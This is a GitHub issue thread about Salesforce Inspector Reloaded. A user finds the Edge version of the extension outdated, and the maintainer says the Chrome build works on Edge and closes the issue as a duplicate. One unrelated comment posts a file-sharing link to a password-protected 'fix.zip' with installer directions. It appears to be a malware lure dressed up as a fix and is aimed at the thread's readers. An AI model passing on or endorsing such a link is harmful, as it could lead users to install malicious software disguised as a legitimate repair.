### ISSUE TITLE
[general] Plugin Edge version is bad

### ISSUE THREAD

**Issue by thierrytrouin** [tprouvot/Salesforce-Inspector-reloaded#529]
Hi Salesforce Inspector Team,

I use the plugin with Chrome, Opera and Edge.
I curently have the version 1.23 except Edge, I have the version 1.19

Is this a browser bug or something else ?
I tried uninstalling and installing a new one but it's the same

Thanks and have a nice day.

![image](https://github.com/user-attachments/assets/48e60c29-6eab-4940-ae11-84a8aed44744)

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tprouvot** [comment]
Hi @thierrytrouin,
In fact Chrome plugin can be installed on Edge that's why I stopped to upgrade the edge version.
I have to update the description on the edge store to mention this.

Duplicate with #498

**Comment by varcrysis** [comment]
Hello, i think its a same issue but extension is stop working in chrome and I did remove and reinstalled it but it is not showing in chrome anymore maybe because of inactive service worker
![Screenshot 2024-08-26 at 10 11 56](https://github.com/user-attachments/assets/6a34bfa9-5da5-44cb-b3e6-dd4e63a46aa9)

**Comment by tprouvot** [comment]
Hi @varcrysis could you create a new issue for this topic ?
